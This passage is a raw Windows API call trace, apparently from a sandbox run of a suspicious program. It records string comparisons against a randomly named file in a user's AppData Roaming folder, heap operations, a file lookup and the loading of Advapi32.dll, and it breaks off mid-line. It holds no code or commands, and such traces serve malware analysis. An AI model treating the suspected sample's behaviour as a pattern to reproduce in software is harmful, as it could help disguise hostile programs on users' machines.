(Locale=0x400, dwCmpFlags=0x1, lpString1="AsI 0_L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sI 0_L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0199.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I 0_L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 0_L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0_L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.683] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0199.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JdjU4gAsI 0_L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="djU4gAsI 0_L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jU4gAsI 0_L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U4gAsI 0_L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4gAsI 0_L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gAsI 0_L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AsI 0_L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sI 0_L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I 0_L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 0_L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0_L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.684] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0199.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0199.685] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0199.686] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0199.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.686] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0199.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.687] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0199.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0199.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0199.687] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0199.687] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.687] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0199.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.688] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0199.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.688] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.688] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.688] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/JdjU4gAsI 0_L.gif", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x522e0c50, ftCreationTime.dwHighDateTime=0x1d4cfa5, ftLastAccessTime.dwLowDateTime=0x2da73d0, ftLastAccessTime.dwHighDateTime=0x1d4ce30, ftLastWriteTime.dwLowDateTime=0x2da73d0, ftLastWriteTime.dwHighDateTime=0x1d4ce30, nFileSizeHigh=0x0, nFileSizeLow=0xda8a, dwReserved0=0xa400039, dwReserved1=0x16233, cFileName="JdjU4gAsI 0_L.gif", cAlternateFileName="JDJU4G~1.GIF")) returned 0xaa5960 [0199.688] FindClose (in: hFindFile=0xaa5960 | out: hFindFile=0xaa5960) returned 1 [0199.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.689] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0199.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0199.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0199.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.691] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.692] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0199.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0199.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0199.692] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0199.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.693] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0199.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.693] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.693] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.694] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c90 [0199.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.694] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0199.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.694] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.695] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.695] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0199.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.697] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0199.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0199.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0199.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.698] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0199.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 